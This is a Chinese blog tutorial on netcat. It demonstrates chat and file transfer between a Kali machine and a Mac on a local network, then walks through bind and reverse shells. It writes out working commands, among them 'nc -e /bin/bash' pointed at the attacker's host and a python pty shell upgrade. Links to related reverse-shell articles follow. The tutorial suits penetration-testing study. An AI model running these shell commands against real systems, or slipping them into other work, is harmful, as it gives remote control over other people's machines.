使用NC命令反弹Shell

傷城~ 2022-03-08 06:46 928阅读 0赞

*  nc全称为netcat，所做的就是在两台电脑之间建立链接，并返回两个数据流
 *  可运行在TCP或者UDP模式，添加参数 —u 则调整为udP，默认为tcp
 *  \-v 参数，详细输出
 *  \-n参数，netcat不要DNS反向查询IP的域名
 *  \-z参数，连接成功后立即关闭连接

**本文使用两台电脑操作，一台是Kali（192.168.0.23），一台是Mac（192.168.0.24)**

# 使用NC聊天 #

有些电脑不支持，而且跟机器使用顺序还有关系。  
比如我在Kali上（192.168.0.23）输入：

root@kali:~# nc -l 1234

在Mac上（192.168.0.24）输入：

➜  ~ nc 192.168.0.23 1234

结果是无法连接。

然而我调换了顺序之后，就可以连接了，很神奇：  
Kali:

root@kali:~# nc 192.168.0.24 1234
    asd
    dsa

Mac:

➜  ~ nc -l 1234
    asd
    dsa

# 使用NC进行文件传输 #

同样的，先在Mac上输入，回车后等待：

➜  Desktop nc -l 1234 > file
    .......

在Kali上输入：

root@kali:~/Desktop# nc 192.168.0.24 1234 < DNS
    .........

回到Mac，查看file文件，已经传输过来了：

➜  Desktop cat file
    @
    *
    0
    000
    001
    002

# NC反弹shell #

*  目标是将Kali上的Shell弹到Mac上，最终效果是在Mac上使用命令行操作Kali。

## 正向反弹shell ##

Kali上输入:

root@kali:~# nc -lvvp 7777 -e /bin/bash
    listening on [any] 7777 ...

Mac上输入：

➜  ~ nc 192.168.0.23 7777

回车之后Kali上显示连接成功：

root@kali:~# nc -lvvp 7777 -e /bin/bash
    listening on [any] 7777 ...
    192.168.0.24: inverse host lookup failed: Unknown host
    connect to [192.168.0.23] from (UNKNOWN) [192.168.0.24] 58773

此时Mac上使用ls命令，列出Kali上的文件信息：

➜  ~ nc 192.168.0.23 7777
    ls
    52.cn_ips.txt
    52.com.cn_ips.txt
    Desktop
    Documents
    Downloads
    .....

## 反向反弹shell ##

首先在Mac上输入：

➜  ~ nc -l 7777

然后再Kali上输入：

root@kali:~# nc -e /bin/bash 192.168.0.24 7777

此时回到Mac，输入ls即可查看Kali上文件目录：

➜  ~ nc -l 7777
    ls
    52.cn_ips.txt
    52.com.cn_ips.txt
    Desktop
    Documents
    Downloads

所以正向弹shell是在靶机上监听端口，然后攻击者链接  
反向弹shell是在攻击者电脑上监听端口，然后靶机链接

如果确定靶机上安装了python，即可使用python生成一个标准shell：  
nc连接上靶机之后首先输入：

python -c "import pty;pty.spawn('/bin/bash')"

发表评论取消回复

表情：

评论列表（有 0 条评论，928人围观）

还没有评论，来说两句吧...

相关阅读

相关 nc传shell抓包-nc连接获取shell

nc传shell步骤 1、渗透过程中免不了获取shell，可以通过nc工具连接，当然还有其他很多的工具，只不过nc默认安装在linux中，比较方便。 nc正向连接，

末蓝、/ 2023年09月27日 09:44/ 0 赞/ 66 阅读

相关 minio反弹shell

minio反弹shell漏洞分析:MinIO 组件中 LoginSTS 接口其实是 AWS STS 登录接口的一个代理，用于将发送到 JsonRPC 的请求转变成 STS 的

朴灿烈づ我的快乐病毒、/ 2023年09月23日 17:20/ 0 赞/ 47 阅读

相关反弹shell以及常见的反弹Shell语句原理

什么是反弹shell呢？它的原词为`reverse shell`，含义如下 > 控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。

亦凉/ 2023年09月23日 13:06/ 0 赞/ 56 阅读

相关 Linux命令-nc（端口监控、文件传输、反弹shell等）

目录简介参数 nc的作用参数详解使用举例客户/服务器模式文件传输基于TCP的上层协议端口扫描反弹Shell --------------

灰太狼/ 2022年09月11日 14:11/ 0 赞/ 331 阅读

相关 nc命令

记录：开端口的命令。 nc -\[u\]lp port \[root@jane root\]\ nc -lp 1500 & \[1\] 2938

Bertha 。/ 2022年07月14日 16:10/ 0 赞/ 209 阅读

相关使用NC命令反弹Shell

nc全称为netcat，所做的就是在两台电脑之间建立链接，并返回两个数据流可运行在TCP或者UDP模式，添加参数 —u 则调整为udP，默认为tcp \-v

傷城~/ 2022年03月08日 06:46/ 0 赞/ 929 阅读

相关反弹shell

1. 关于反弹shell 就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标

Dear 丶/ 2021年12月10日 02:34/ 0 赞/ 430 阅读

相关 icmp反弹shell 简介

目录第一节轶事第二节技术原理第三节 ICMP反弹shell -------------------- 第一节轶事首次听说icmp隧道，要从免

た入场券/ 2021年08月28日 18:20/ 0 赞/ 465 阅读

相关 linux 反弹shell（二）反弹shell的本质

0X00 前言在上一篇文章 [Linux反弹shell（一）文件描述符与重定向][Linux_shell]，我们已经讨论过了反弹shell中最核心也是相对较难理解的部分

柔光的暖阳◎/ 2021年08月19日 20:11/ 0 赞/ 539 阅读

相关使用 openssl反弹加密 shell

目录前言 OpenSSL 简介使用 OpenSSL 生成证书自签名证书使用 OpenSSL 反弹加密 shell Linux Windows 使用 Open

我不是女神ヾ/ 2021年07月28日 19:25/ 0 赞/ 793 阅读